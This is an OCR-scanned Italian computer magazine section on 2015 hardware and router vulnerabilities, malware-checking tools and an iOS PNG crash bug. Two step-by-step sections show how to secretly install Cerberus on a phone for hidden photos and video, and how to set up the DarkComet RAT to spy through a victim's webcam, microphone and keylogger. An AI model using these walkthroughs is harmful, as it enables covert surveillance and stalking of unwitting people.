tappato le falle di sicurezza distribuendo 
due aggiornamenti, uno per ciascuna ver¬ 
sione del programma, scaricabili da www. 
winmagazine.it/link/3462. 


D0LL 

Anche Dell ha avuto seri problemi di sicurezza nel 
2015 e due, nello specifico, sono piuttosto gravi. 
Analizziamoli in dettaglio. 


COSA RISCHIAMO 


Alcuni portatili Dell sono stati distribuiti con un 
certificato di root HTTPS che permette a software 
malevoli o a un hacker di sostituirsi crittografica¬ 
mente ad un sito Web e installare codice maligno. 
Il certificato, chiamato eDelIRoot, essendo stato 
rilasciato da Dell ha una firma valida a tutti gli effetti 
e può essere utilizzato da chiunque per creare un 
proprio certificato HTTPS apparentemente valido. 
Scoperta la cosa Dell si è scusata con i propri clienti 
e ha fornito un tool e le istruzioni per la rimozione 
del certificato. Dell si è giustificata affermando che 
il certificato non è un malware o un adware, ma è 
stato concepito esclusivamente per fornire il codice 
di matricola del sistema al supporto on-line, per¬ 
mettendo agli addetti all'assistenza di identificare 
rapidamente il modello. Peccato che oltre a questo 
venivano messi a rischio i dati degli utenti. 



■ Sul proprio sito Dell ha pubblicato la procedura 
per rimuovere i certificati eDelIRoot e 
DSDTestProvider dai computer. 


COME PROTEGGERCI 


Due soli giorni dopo essersi scusata per il disagio cau¬ 
sato dal certificato eDelIRoot, l'azienda americana si 
è trovata invischiata in un nuovo scandalo: a seguito 
di una verifica sugli altri software preinstaliati è stato 
rilevato come l'applicazione Dell Sistem Detect, che 
permette di interagire in modo personalizzato con il 
supporto Dell, ha lo stesso problema di eDelIRoot a 
causa del suo certificato DSDTestProvider e proprio 
come questo può essere rimosso con lo stesso tool. 
Particolare curioso: diversi strumenti di rilevamento 
malware, tra cui Malwarebytes (sezione Speciali/ 
Hardware Protector20 7 7 del Wi n DVD-Rom), clas- 
sificano l'applicazione tra i programmi "a rischio", 
consigliandone la rimozione. Possiamo seguire il 
consiglio ed eliminare la minaccia oppure aggiornare 
l'applicazione da www.winmagazine.it/link/3463. ^ 
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MINI COMPUTER 


Il Raspberry Pi è un mini computer che utilizza un sistema operativo particolar¬ 
mente leggero derivato da Linux. Purtroppo proprio quello ufficiale, il Raspbian, 
ha una vulnerabilità che coinvolge le chiavi SSH utilizzate per identificare il 
Rasperry Pi su un server SSH. 


COSA RISCHIAMO 


L'SSH viene normalmente utilizzato, ad esempio, per accedere alla linea di 
comando del Raspberry Pi da un altro computer collegato alla stessa rete. 
Purtroppo una sequenza di boot non corretta può generare una chiave SSH 
debole e facilmente scopribile a causa della mancata abilitazione del generatore 
hardware di numeri casuali. Il problema è stato ben spiegato da uno sviluppatore 
chiamato Oittaa (www.winmagazine.it/link/3464). 


COME PROTEGGERCI 


Al momento non sono state rilasciate patch in grado di risolvere il problema. 


SMARTPHONE 




Intercettare le chiamate? Si può! I possessori di Sam¬ 
sung Galaxy S6 e Galaxy S6 Edge, sono potenzialmen¬ 
te soggetti ad una vulnerabilità di tipo "Man in thè 
middle"mica da ridere. 


COSA RISCHIAMO 


A scoprire la vulnerabilità sono stati Daniel Komaromy 
e Nico Golde, due ricercatori che hanno dimostrato co¬ 
me, utilizzando smartphone basati su chip baseband 
"shannon", si possano intercettare le conversazioni in 
partenza e in arrivo da essi. Ovviamente non sono stati 
resi noti i dettagli dell'exploit, ma possiamo capire 
come funziona a grandi linee. Quello che occorre 
per un attacco di tipo Man in thè middle è una base 
station OpenBTS alla quale il Samsung si connetterà 
automaticamente. Quando ciò accade, questa potrà 
iniettare un nuovofirmware perla baseband che farà 
instradare verso la base station "contraffatta"tutte le 
conversazioni, che potranno quindi essere registrate 
e poi inviate verso la normale rete telefonica. 


COME PROTEGGERCI 


Per adesso il problema pare circoscritto ai due telefoni 
citati, ma che la cosa potrebbe allargarsi a molti altri 
smartphone Android. 


■ Nonostante utilizzi una versione extra-light di Linux, un sistema estremamente 
sicuro, neanche il Raspberry Pi si sottrae alle vulnerabilità. 


■ I due ricercatori Daniel Komaromy e Nico Golde mostrano l'exploit trovato al Pwn20wn di Tokyo. 


TOSHIBA 


Problemi anche per il Toshiba Service Station, il pro¬ 
gramma utilizzato per cercare automaticamente 
aggiornamenti per gli altri software Toshiba 


COSA RISCHIAMO 


A causa di una vulnerabilità, il modulo di aggiorna¬ 
mento dei noteboolToshiba poteva consentire ad un 
utente esterno di bypassare le protezioni in lettura e 
scrittura del registro di Windows. 


COME PROTEGGERCI 


Purtroppo al momento non ci sono soluzioni a questo 
problema, se non la completa rimozione dell'appli¬ 
cazione. E il fatto che di recente siano circolate voci 
secondo le quali Toshiba vorrebbe effettuare lospin 
off della divisione computer non lascia presagire una 
soluzione immediata. 


■ Il Toshiba Service Station dovrebbe aiutare l'utente 
a tenere aggiornato il proprio sistema, e invece apre 
le porte del computer ad eventuali malintenzionati. 
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ROUTER 


I 


NETGEAR 


SOAP (Simple Object Access Protocol) è 
un protocollo basato su XML ed utilizzato 
per lo scambio di messaggi e dati tra 
componenti software, ad esempio per 
inviare una richiesta da un client ad un 
server e ricevere informazioni. 


COSA RISCHIAMO 


Netgear lo utilizza nell'applicazione Ge¬ 
nie Desktop, che permette di modificare i 
parametri del dispositivo da PC. Purtrop¬ 
po questo componente con¬ 
tiene una falla di sicurezza 
sfruttabile da un hacker per 
scoprire la chiave del Wi-Fi, 
la password e il seriale del 
router oltre a dettagli sui 
dispositivi ad esso connessi. 


■ I router Netgear coinvolti nel problema hanno tutti ricevuto un aggiornamento per 
il firmware. Controlliamo e aggiorniamo anche il nostro. 
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COME PROTEGGERCI 


Per risolvere il problema aggiorniamo il 



firmware del router alla sua ultima 
versione e disabilitiamo la gestione 
remota. 


■ Alcuni router Netgear hanno 
una vulnerabilità che potrebbe 
permettere ad un hacker di violare 
la sicurezza del computer. 


VULNERABILITÀ 

DNS 

Di recente due socie¬ 
tà che si occupano di 
sicurezza, la Compass 
Security e la Shellshock 
Labs, hanno scoperto un 
exploit che permette di 
acquisire l'accesso come 
root sui router Netgear 
senza che si debba indi¬ 
care alcuna password. A 
dire il vero i router che 
soffrono di questo pro¬ 
blema non sono moltissi¬ 
mi (pare siano tra i 5.000 
e i 10.000), ma la sua gra¬ 
vità rimane visto che la 
navigazione dell'utente 
potrebbe essere reindi¬ 
rizzata verso un sito spe¬ 
cifico, magari"preparato" 
ad arte per diffondere 
dei malware. La solu¬ 
zione? Colleghiamoci a 
www.winmagazine.it/ 
link/3465 e scarichiamo 
il nuovo firmware per il 
nostro router (se presen¬ 
te nell'elenco). 


£3 SEC Consult 


NetUSB è una tecnologia proprietaria sviluppata 
dalla società taiwanese KCodes grazie alla quale è 
possibile offrire funzionalità "USB Over IP"e rende¬ 
re così disponibili in una rete locale i servizi di un 
qualsiasi dispositivo connesso ad una porta USB e 
pensato per condividere file. La condivisione viene 
gestita tramite l'avvio di un server sulla porta TCP 
20005 al quale si interfaccia il software presente sul 
PC dell'utente. Normalmente il client invia al server 
il proprio nome per effettuare l'autenticazione; se 
però questo supera i 64 caratteri viene generato 
un errore di Buffer overflow che un hacker potreb¬ 
be sfruttare per far crashare il router o provare ad 
eseguire da remoto codice malevolo su di esso. Ad 
essere affetti da questo problema sono router di 
molte marcheitra queste troviamo D-Link, Netgear, 
TPLink.TRENDneteZyXEL, ma non solo. Purtroppo 
al momento non tutti hanno preso provvedimenti. 
Il nostro consiglio è il solito: aggiorniamo sempre il 
router con l'ultima versione del firmware. Da notare 
che questo problema non affligge i prodotti la cui 
porta USB è dedicata esclusivamente alla connes¬ 
sione di chiavette USB 3G/4G. 



■ TP-Link è stato 
uno dei primi 
produttori a 
rendere disponibili 
aggiornamenti 
per i firmware dei 
router coinvolti nel 
problema NetUSB. 
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Controlla se il router è vulnerabile 

Sospettiamo che il nostro dispositivo Wi-Fi abbia qualche vulnerabilità? Vogliamo verificarlo? Basta installare Avast, 
l’antivirus gratuito che include anche un controllo specifico per queste periferiche. Ecco come procedere. 



Antvrus 


“ Menu 


Protezione rete don 


J fri tz. box 


Dettagli 







m - UtKNOWN 
^MJMTTh 

FiJB'jOil 




.x Installiamo l’antivirus 

Scarichiamo e scompattiamo l’archivio Avast. 
zip dagli Indispensabili del Win DVD-Rom, 
quindi installiamo Avast. All'avvio clicchiamo Scan¬ 
sione e poi Scansione minacce di rete per cercare 
eventuali problemi di sicurezza su PC, router e dispo¬ 
sitivi di rete. 


^ Controllo in corso 

Se abbiamo molti dispositivi connessi, la scan¬ 
sione può richiedere diversi minuti. Al termine 
se non vengono rilevate vulnerabilità verrà visualizza¬ 
to il messaggio Nessun problema rilevato su que¬ 
sto dispositivo. Verifichiamo che il check sia presente 
anche sulla riga relativa al router. 


^ Corriamo ai ripari 

Se vogliamo sapere quali servizi sono attivi, 
basta cliccare sul link Dettagli. Troveremo tut¬ 
to ciò che il router condivide con la rete, tra cui il nome 
e il produttore, gli indirizzi IP e MAC e le porte aperte. 
Se dovessero esserci problemi, toccherà avviare gli 
opportuni correttivi. 


UN ANNO DI INSICUREZZA 



L'anno appena trascorso ci ha regalato centinaia di casi di vulnerabilità. Shavlik, 
una società che si occupa di servizi per la tutela della sicurezza aziendale, ha 
stilato una classifica basandosi sul numero di comunicati ufficiali (i cosiddetti 
Security Bullettin) emanati dalle stesse aziende e da segnalazione pubbliche e 
private di sviluppatori e agenzie di sicurezza. Da questa classifica si scopre che 
l'azienda verso cui siamo abituati a puntare il dito, ovvero Microsoft, è soltanto 
seconda con 135 Security Bullettin e 571 vulnerabilità totali. In prima posizione 
troviamo invece l'insospettabile Apple, con ben 654 vulnerabilità rilevate. Di 
queste, ben 384 si devono a MacOS X, un valore quasi triplicato rispetto alle sole 
130 del 2014. Cisco, Oracle e Adobe seguono distaccate, 

mentre i più virtuosi sono 
Asus e Lenovo, con sole 
11 vulnerabilità. Se sia¬ 
mo interessati, possia¬ 
mo consultare la classi¬ 
fica completa su www. 
winmagazine.it/ 
link/3466. 


CVE Details 

The ultimate security vulMrability datasource 
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VULNERABILITÀ IN COSTANTE AUMENTO 


Rimuovi il bloatware dal computer 


Hai acquistato un nuovo computer e lo hai trovato pieno di programmi inutili che si avviano automaticamente 
rallentando il funzionamento di Windows? Ripuliscilo con le utility consigliate da Win Magazine. 


La sicurezza nei dispositivi connessi alla Rete è importante, soprattutto adesso, in quanto 
la cosiddetta loT (Internet ofThing, l'Internet delle Cose) è in fase di forte crescita. I dispo¬ 
sitivi connessi aumentano giorno per giorno e aumentano le cose che con essi facciamo. 

Una recente ricerca effettuata da Andrei Costin (Eurecom), Apostolis Zarras (Università 
della Ruhr Bochum) e Aurelien Francillon (Eurecom) ha rivelato come in 1.925 firmware 
realizzati da 54 vendor e sottoposti a test siano state trovate ben 9.271 vulnerabilità in 185 
di essi. Non solo: testando 246 Web Interface (quei software che permettono di interfacciarsi 
con un dispositivo tramite il Web), sono state scoperte altre 90 vulnerabilità. 21 firmware 
sono risultati soggetti a vulnerabilità di tipo"command injection", 32 hanno evidenziato 
problemi sull'XSS (Cross Site Scripting), causati da un'insufficiente controllo dell'input nei 
form, e altri 37 sono vulnerabili ad attacchi di tipo CSRF (Cross-Site request forgery). La cosa 
triste è che al momento, nonostante questi risultati, molti produttori non vogliono (o non 
possono) investire maggiormente per migliorare la sicurezza dei propri prodotti. 
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^ Avviamo il ripulitore 

Alla prima accensione di un PC appena acquistato di solito si trovano già 
diverse applicazioni installate. Formattare e installare una versione “pulita” 
di Windows è la soluzione ideale, ma spesso la meno praticabile; meglio optare 
per una pulizia mirata con PC Decrapifier. Scarichiamo il programma dalla sezione 
Speciali del Win DVD-Rom, awiamolo e clicchiamo Analyze. 


P-*?) Shouid I Remove It? 

y Helping you decide whkh PC programs to purge 

Share 

Settings 

You have 80 programs installed 

Ratings 

Removai % 

JDownloader 2 by AppWork GmbH 

★ ★★ 

■M 

Any Video Converter 5.8.4 by Any-Video-Converter... 

★ ★★ 

WM 

fjg 1 ! Free Download Manager 3.9.4 by FreeDownloadM... 

★ ★★ 

m 

^ ZoneAlarm Free Firewall by Check Point 

★ ★★ 

MB 


± Rimuoviamo il superfluo 

2 L’applicazione inizierà una approfondita scansione del sistema alla ricerca 
di applicazioni da rimuovere e le inserirà nei tre tab presenti in home: Rec- 
comended , Questionable e Everything Else. Per eliminare un’applicazione basta 
semplicemente cliccare sulla relativa casella e poi su Remove Selected. Così facen¬ 
do avremo un computer sicuramente più pulito e veloce. 


?.*?) Shouid I Remove It? 

v y Helping you decide whkh PC programs to purge 

Share 

Settings 

You have 80 programs installed 

Ratings 

Removai % 

JDownloader 2 by AppWork GmbH 

★ ★★ 

■M 

Version 2.0 

Potentially unwanted program 

What is it? 

Uninstall 

Instali size 203 KB 

j ^ Any Video Converter 5.8.4 by Any-Video-Converter... ★★★ 






^ Una valida alternativa 

Altro programma interessante per rimuovere bloatware e altri software più o 
meno inutili è Shouid I Remove It , anch’esso presente nella sezione Speciali 
del Win DVD-Rom. Scarichiamolo e installiamolo, quindi awiamolo e attendiamo il 
termine della scansione. Le applicazioni trovate verranno visualizzate in base alla 
loro “inutilità” di permanenza sul PC. 


^ Disinstallazione in corso 

^ Cliccando su uno dei programmi elencati appariranno due pulsanti. Con un 
clic su Whatis /f? verrà aperta una finestra del browser con informazioni 
sull’applicazione selezionata. Facendo clic su Uninstall , invece, l’applicazione ver¬ 
rà eliminata dal sistema. Dovremmo rimuovere prima i programmi che presentano 
una banda rossa o arancio; sono quelli più disinstallati dagli utenti. 


Speciali Win Magazine 75 






























O Hacker in pratica 


Fai da te | L'hardware fa la spia 


SCOPRI SE ANCHE LE TUE PERIFERICHE HARDWARE SONO A RISCHIO 


SCOPRIREI PROCESSI 
NASCOSTI CHE 
MONITORANO LE ATTIVITÀ 

Per scoprire se sul nostro computer 
si annida qualche programma-spia, 
possiamo usare SpyDetect-Free (se¬ 
zione Speciali/Hardware Protector 
2017), il quale effettua un controllo 
velocissimo e permette di scopri¬ 
re in poco più di un minuto se si è 
spiati o monitorati. Per capire se si 
è spiati viene effettuata una ricerca 
sui processi nascosti, eventualmente 
pronti a registrare tasti premuti e 
password digitate. Per scoprire se 
siamo monitorati, invece, per 60 se¬ 
condi il programma si mette in attesa 
per scoprire se vi sono processi che 
cercano di monitorare quali finestre 
si aprono sul computer. Utilizzare 
questo programma è semplicissi¬ 
mo: tutto ciò che dobbiamo fare è 
avviarlo e cliccare sul pulsante Check 
Now. Se non ci sono problemi dopo 
la scansione vedremo due Probably 
Not nei pulsanti verdi in basso. Se 
invece c'è qualche problema, allora 
i pulsanti si coloreranno in giallo e la 
scritta sarà Probably Yes. Cliccando 
sul pulsante Details è possibile vede¬ 
re quali sono i processi in esecuzione 
rilevati da SpyDetectFree. 


«RllMHllNdOll? 


VERIFICARE LA PRESENZA 
DI ROOTKIT 

Il modo migliore per verificare se 
siamo stati"colonizzati"da un rootkit, 
ovvero da un programma in grado di 
prendere il controllo del sistema sen¬ 
za la nostra autorizzazione è usare 
Malwarebytes AntiMalware (sezione 
Speciali/Hardware Protector 2017). 
Prima di utilizzarlo, però, dovremo 
modificare qualche impostazione, 
visto che normalmente Malware- 
bytes non effettua una scansione 
per i rootkit per evitare di allungare 
troppo i tempi di scansione. Abilitia¬ 


mo la scansione cliccando su Impo¬ 
stazioni, Rilevamento e protezione, 
quindi sull'opzione Ricerca Rootkit. 
Il problema con i rootkit, come tra 
l'altro spiegato anche sul sito di Mal- 
wareBytes, è che questi non sempre 
possono essere eliminati senza con¬ 
seguenze serie per il sistema, come 
blocchi o instabilità. Se, quindi, la 
scansione dovesse riportare come 
risultato qualche Unknown.Rootkit 
conviene contattare il supporto di 
MalwareBytes per capire come inter¬ 
venire nel modo più corretto. 


anche i social widget (opzione di¬ 
sattivabile). 
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SCOPRIRE E BLOCCARE 
ITRACKERWEB 

La Electronics Frontier Foundation 
ha reso disponibile uno strumento 
chiamato Privacy Badger (sezione 
Speciali/Hardware Protector 2017), 
disponibile per Chrome e Firefox, 
con il quale è possibile controllare e 
bloccare i cookie tracker. Se durante 
la navigazione si dicca sulla sua icona 
si apre una finestra nella quale trami¬ 
te tre colori è possibile individuare 
la pericolosità dei cookies presenti. 
Quelli in verde sono innocui perché 
provengono da domini non aggres¬ 
sivi. Quelli in giallo ci tracciano per 
mostrare contenuti appropriati al 
nostro target, mentre quelli in rosso 
sono i cookies da bloccare perché 
invasivi della privacy. Agendo sugli 
slider associati a ciascun cookie è 
possibile modificare il comporta¬ 
mento di Privacy Badger, abili 
tando cookie bloccati o, 
viceversa, bloccando 
cookie innocui 
Utile la possibi¬ 
lità di bloccare 


SCOPRIAMO COSA VIENE 
ESEGUITO IN BACKGROUND 

Normalmente ci sono decine di 
programmi e servizi che vengono 
eseguiti in background su un com- 
puter.Tra questi potrebbero esserci 
dei malware connessi ad Internet e 
pronti ad aprire le porte del nostro 
computer a qualche malintenziona¬ 
to, che potrebbe usarlo per creare 
una botnet. Per scoprire cosa viene 
eseguito in background possiamo 
utilizzare Process Explorer (sezione 
Speciali/Hardware Protector 2017), 
un tool gratuito di Microsoft che 
permette di valutare l'innocuità dei 
processi in esecuzione. Cliccando su 


ciascuno di essi con il tasto destro del 
mouse e scegliendo Check Virus Total 
è possibile analizzarli utilizzando più 
di 50 scanner antimalware per con¬ 
trollarne l'innocuità. Nel caso venga 
rilevato qualcosa di strano possiamo 
terminare il processo direttamente 
dal programma ed effettuare una 
scansione con un programma an¬ 
timalware esterno. Per controllare 
quali processi o quali applicazioni 
stiano trasmettendo o ricevendo 
dati da Internet, invece, possiamo 
utilizzareTCPView (sezione Speciali/ 
Hardware Protector 2017), che elen¬ 
ca ordinatamente l'indirizzo locale 
dell'applicazione e quello remoto, 
col quale vengono scambiati i da¬ 
ti. Ovviamente, è sempre possibile 
selezionare uno dei processi attivi e 
terminarne l'esecuzione scegliendo 
End Process o Close Connection. 




IMPEDISCI A WINDOWS 10 
DI FARSI I FATTI TUOI 

Windows 10 è un pochino spione e 
questo lo sappiamo già, ma cosa fa¬ 
re per evitarlo? Fondamentalmente 
una cosa sola: disattivare Cortana. 
A parte questo è possibile utilizzare 
dei software realizzati apposita¬ 
mente per migliorare la privacy di 
Windows 10. Tra questi consiglia¬ 
mo O&O ShutUp 10 e Ashampoo 
AntiSpy for Windows 10 (sezione 
Speciali/Hardware Protector 
2017), che offrono un gran 
numero di impostazioni 
configurabili per rendere 
il più privata possibile 
la nostra esperienza 
d'utilizzo del più 
recente sistema 
operativo Mi¬ 
crosoft. 
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L'HARDWARE! 

modificato per spiarci • 




Così installano la spia nel cellulare 

Cerberus è un’app che può essere usata come antifurto per smartphone, ma se configurata in maniera malevola 
consente di controllare il dispositivo da remoto per “impicciarsi” dei fatti altrui. Vestiamo quindi i panni del pirata... 



^ Il finto antifurto 

Verifichiamo che lo smartphone o il tablet 
Android da controllare siano connessi a Inter¬ 
net (tramite la rete 3G/4G o un hotspot Wi-Fi): accedia¬ 
mo al PlayStore , cerchiamo l’app gratuita Cerberus 
antifurto e installiamola. Al primo awio tappiamo Crea 
un accountCerberus. Scegliamo un nome utente, una 
password e forniamo un indirizzo e-mail valido. 


Cerberus: foto scattata (Archos 50c Oxygen 

Cerberus <no-reply@cerberusapp.com> 

a me Q 

Cerberus ha scattato una foto. La puoi trovare in allegat 
Questo è un messaggio automatico, per favore non risp 



^ Scattiamo una foto 

^ Dal menu Dispositivo selezioniamo il tablet o 
lo smartphone da controllare. Spostiamoci in 
Comando e selezioniamo Scatta foto. In Comando 
appaiono delle nuove opzioni: selezioniamo Scatta foto 
immediatamente. Come impostazione predefinita, 
verrà usata la fotocamera frontale: se vogliamo usare 
quella principale, spuntiamo Usa camera posteriore. 



C’è ma non si vede 

Useremo questi dati per controllare il dispositi¬ 
vo da remoto. Confermiamo con Crea account. 
Accettiamo la licenza e tappiamo Crea account. 
Dall’interfaccia principale dell’app tappiamo sulle 
linee orizzontali in alto a sinistra per accedere al Main 
menu. Da Configurazione principale tappiamo Pas¬ 
sword e attiviamo Nascondi dalla lista applicazioni. 


Dispositivo: Archos 50c Oxygen (862996028457154) * 
Comando: Cattura video » 

Cattura video immediatamente •> Usa camera 
Secondi (max 30) 5 

| Invia comando 



^ Immagini via e-mail 

Confermiamo con Invia comando. Affinché tut¬ 
to funzioni è necessario che il tablet o lo smart¬ 
phone controllato sia connesso al Web. Accediamo alla 
casella di posta indicata al Passo Al e verifichiamo 
che sia arrivato un nuovo messaggio: in allegato tro¬ 
veremo la foto catturata di nascosto! Se vogliamo regi¬ 
strare un video, selezioniamo Cattura video. 



^ Si controlla dal Web 

Grazie alla comoda interfaccia Web, il device 
può essere controllato da qualsiasi PC connes¬ 
so ad Internet. Su www.cerberusapp.com compiliamo 
i campi Username e Password con i dati scelti al Pas¬ 
so Al . Confermiamo con un clic sul pulsante Log in. 
Appare così l'interfaccia di controllo remoto dell'appli¬ 
cazione Cerberus. 


Cerberus: video catturato (Archos 50c Oxyg 

Cerberus <no-reply@cerberusapp.com> 

a me 0 

Cerberus ha catturato un video. Lo puoi trovare in alleg< 
Questo è un messaggio automatico, per favore non risp 


g video.3gp 


^ Non hai più segreti 

Scegliamo la fotocamera da usare, impostia¬ 
mo la durata del video (massimo 30 secondi) 
e confermiamo con Invia comando. Riceveremo una 
nuova e-mail con il allegato il filmato rubato. Il formato 
di registrazione è ,3gp e la qualità dipende, per ovvie 
ragioni, dalla fotocamera installata nello smartphone 
o tablet spiato. 
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Fai da te | L'hardware fa la spia 


Ti vedo e ti sento dalla Webcam 


Con DarkComet al pirata bastano pochi clic per attivare da remoto la Webcam e il microfono collegati al PC della 
vittima. Deve solo trovare il modo di installarli sul suo PC e configurare i DNS per renderlo sempre raggiungibile... 



^ Un nuovo dominio 

Per far sì che il suo PC sia raggiungibile anche 
da remoto, il pirata usa un servizio di DNS 
dinamico come www.no-ip.com che, previa registra¬ 
zione, assegna al PC un nome tipo dominio.no-ip.org. 
Avendo accesso al PC della vittima il pirata installa 
quindi il tool Simple Pori Forwarding. 



^ Ti spio quando voglio 

^ A questo punto il pirata avvia DarkComet RAT 
Legacy e si connette al PC spiato cuccando 
DarkComet-RAT. Sceglie Listen tonewporte clicca 
Listen per stabilire la connessione. In Spy Functions 
attiva la Webcam da remoto e dal menu che appare 
fa doppio clic su Webcam Capture. 


^ Una porta sempre aperta 

Avvia il programma, si sposta nel menu File e 
clicca Aggiungi porte. Nella nuova schermata 
sceglie Aggiungi personale: digita un Nome identifi¬ 
cativo e compia il campo Porta Finale con 1604, con¬ 
fermando con Aggiungi. Passa quindi all’installazione 
di DarkComet RAT Module. 



x Ecco le immagini! 

Si ritrova così nella schermata d’impostazione 
della Webcam. Dopo aver selezionato la perife¬ 
rica, non deve fare altro che cliccare sul pulsante Start 
Capture. Di default, la qualità dell'immagine è ottimiz¬ 
zata, proprio per evitare di consumare troppa banda e 
rallentare il trasferimento. 


^ Configurazione lampo! 

Avvia DarkComet e in /P/D/VS inserisce il domi¬ 
nio registrato al Passo 1. Compila Port con 
1604 e spunta Active ottime keylogger during this 
session. Preme Settings, attiva le opzioni presenti e 
termina con Fine e Active. Ora installa DarkComet RAT 
Legacy sul PC che userà per spiare. 



a C’è anche l’audio 

Il software spia è in grado di mostrare non solo 
le immagini riprese di nascosto dalla Webcam, 
ma anche i suoni presenti nell'area circostante al com¬ 
puter spiato. Per fare ciò, il pirata clicca due volte su 
Sound Capture (lasciando invariate le impostazioni 
mostrate) e conferma con Capture 



ANCHE LA SMART TV CI SPIA 

Permettono di collegarsi a Internet per navigare rimanendo comodamente 
seduti sul divano di casa e, come uno smartphone o un tablet, offrono la 
possibilità di installare decine di app per aggiungere nuove funzioni o 
trasformarle in divertenti console di gioco: stiamo parlando, ovviamente, 
delle Smart TV, sempre più diffuse nei salotti degli italiani. Proprio alcune 
di queste funzioni, però, possono rappresentare un serio pericolo per la 
nostra privacy. È storia di questi giorni la notizia secondo la quale i sistemi 
di riconoscimento vocale e le Webcam integrate nelle Smart TV Samsung 
hanno il brutto vizio di trasmettere in chiaro verso server remoto tutti i 
suoni e le immagini che riprendono nell'ambiente circostante. Samsung 
ovviamente è subito corsa ai ripari, promettendo un aggiornamento del 
sistema operativo installato nei suoi TV che permette di criptare tutti que¬ 
sti dati. Per saperne di più, scarichiamo da Win Extra l'inchiesta dedicata 
proprio a questa problematica. 
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| L'hardware fa la spia | Fai da te | 

10 DRITTE PER SCOPRIRE SE IL SISTEMA È PROTETTO 


Avere un antivirus installato è sicu¬ 
ramente un buon modo per assicu¬ 
rarsi che non vi siano problemi con 
virus e altri malware, tuttavia non si 
può avere la sicurezza al 100%. Al¬ 
lora come verificarlo? Ecco qualche 
sintomo che dovrebbe farci quan¬ 
tomeno insospettire e le utility che 
possono aiutarci ad indagare. 

CHE LENTEZZA QUESTO PC 

Il computer che all'improvviso 
rallenta o esegue con difficoltà i 
programmi e la copia di file do¬ 
vrebbe far scattare un campanello 
d'allarme. Le cause possono esse¬ 
re diverse: ad esempio potrebbe 
essere in esaurimento lo spazio 
sul disco rigido oppure questo 
potrebbe essere particolarmente 
frammentato, ma potrebbe anche 
essere un malware. Per verificarlo 
installiamo Reason Code Security 
(sezione Speciali/Hardware Pro- 
tector2017) e avviamo una scan¬ 
sione: se vengono riscontrati pro¬ 
blemi, selezioniamoli e clicchiamo 
su Remove Checked. 


O"— 



IL DISCO È SEMPRE 
INATTIVITÀ 

Se il disco rigido sembra impazzito 
e frulla continuamente, diamo uno 
sguardo a quali sono le applicazio¬ 
ni o i processi in esecuzione. Apria¬ 
mo Gestione attività premendo i 



tasti Ctrl+Alt+Canc e scegliendo 
Gestione risorse dall'elenco che 
appare. Poi clicchiamo su Presta¬ 
zioni, Disco, Apri monitoraggio 
risorse e Disco per verificare cos'è 
che impegna così tanto il disco. 

LO SPAZIO SUL DISCO È FINITO 

A proposito di spazio: se notia¬ 
mo una diminuzione improvvisa 
di spazio libero sul disco rigido 
installiamo un programma come 
TreeSize Free (sezione Speciali/ 
HardwareProtector2016): potre¬ 
mo così vedere quali sono i file che 
occupano più spazio. E se questi 
dovessero avere nomi o estensioni 
strane... meglio un ulteriore con¬ 
trollo antivirus. 



I PROGRAMMI SI CHIUDONO 
DA SOLI! 

Se all'improvviso i programmi e le 
app di Windows si aprono molto 
lentamente o si chiudono inaspet¬ 
tatamente, effettuiamo un con¬ 
trollo antimalware approfondito. 

IL SISTEMA SI BLOCCA 

Se il computer si blocca all'im¬ 
provviso, anche se non stiamo 
eseguendo alcun programma, 
potrebbe essere un sintomo di 
malfunzionamento hardware. 
Oppure un virus. Urge verificare 
con una scansione approfondita. 

L'ANTIVIRUS NON SI 
ABILITA! 

Se l'antivirus è disabilitato e non 
riusciamo più a riabilitarlo, proba¬ 
bilmente siamo vittima di un virus 
o di un altro malware. Effettuiamo 
una scansione con un altro antivi¬ 
rus, magari utilizzando un disco di 
emergenza. 


IMPOSTAZIONI DEL 
BROWSER MODIFICATE 

Altro sintomo di"intossicazione da 
malware"sono le impostazioni del 
browser modificate senza il nostro 
intervento. Di solito ad essere og¬ 
getto di modifica sono le opzioni 
di sicurezza, la pagina iniziale e il 
motore di ricerca. Usiamo un pro¬ 
gramma come AdwCleaner (sezio¬ 
ne Speciali/Hardware Protector 
2017) per risolvere il problema. 


^RduuCleone 



LA CONNESSIONE È LENTA 

L'apertura delle pagine Web e 
i download sono più lenti del 
normale? Controlliamo che non 
vi siano processi anomali che 
consumano banda utilizzando 
un'applicazione come GlassWire 
(sezione Speciali/Hardware Pro¬ 
tector 2017). 



APPAIONO POPUP A CASO 

Se sul computer cominciano ad 
apparire dei popup a casaccio, so¬ 
prattutto se dal dubbio contenuto, 
il computer potrebbe es¬ 
sere infestato 



da un malware. Eseguiamo una 
scansione con uno strumento 
come MalwareBytes AntiMalwa- 
re (sezione Speciali/Hardware 
Protector 2017), disponibile sia 
in versione gratuita che a paga¬ 
mento, con in più la protezione 
in tempo reale. 

GLI AMICI RICEVONO E-MAIL 
"STRANE" 

Se i nostri amici ricevono e-mail 
che non ricordiamo di aver mai 
spedito, magari contenenti soltan¬ 
to un link a qualche sito Web, af¬ 



frettiamoci a cambiare la password 
di accesso alla posta elettronica e, 
se possibile, abilitiamo la verifica 
in due passaggi, con la quale per 
l'accesso viene richiesto anche un 
codice inviato tramite SMS. 



f *- 
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Per saperne di più | La foto che blocca l'iPhone 


Una foto e ti 
blocco l’iPhone 


Una banale immagine in formato PNG può mandare iOS 
in crash. Scopri se anche il tuo sistema è vulnerabile 


C irca un anno addietro alcuni ricer¬ 
catori scoprirono che un particolare 
SMS riusciva a mandare in tilt iOS e 
OS X. Apple corse subito ai ripari, ma ora 
arriva la notizia che l’esperto di sicurez¬ 
za Lander Brandt ha trovato una nuova 
falla nell'ecosistema Apple. In pratica, 
un’innocua immagine in formato PNG 
con l’header leggermente modificato, se 
visualizzata su iPhone/iPad o Mac può 
provocare la chiusura istantanea del 
browser Safari. Ma anche Mail andrà in 
crash se qualcuno avrà allegato l’imma¬ 
gine incriminata, così come l’anteprima 
nelle notifiche o l'apertura della imma¬ 
gine killer in iMessage o in un messaggio 
testuale MMS. 

L’attacco in dettaglio 

Com’è possibile che una semplice imma¬ 
gine riesca a mandare in tilt un intero 
sistema operativo? La risposta è tanto 
semplice quanto sconvolgente. Come 
dicevamo prima, la PNG malevola viene 
appositamente modificata nel suo header, 
cioè nella cosiddetta intestazione del file 
che permette ai sistemi operativi (non 
solo quelli Apple, ma anche Windows e 
Linux) di identificarne correttamente il 
formato. In particolare, per le immagini 
PNG vengono utilizzati 4 byte per iden¬ 
tificare il tipo di file. Ebbene, Brandt ha 
scoperto che basta modificare oppor¬ 
tunamente questo valore per violare la 
sicurezza dei sistemi operativi Apple. In 
particolare, nel momento in cui si apre 
un’immagine PNG viene inviato al sitema 
il comando read_user_chunk_callback 
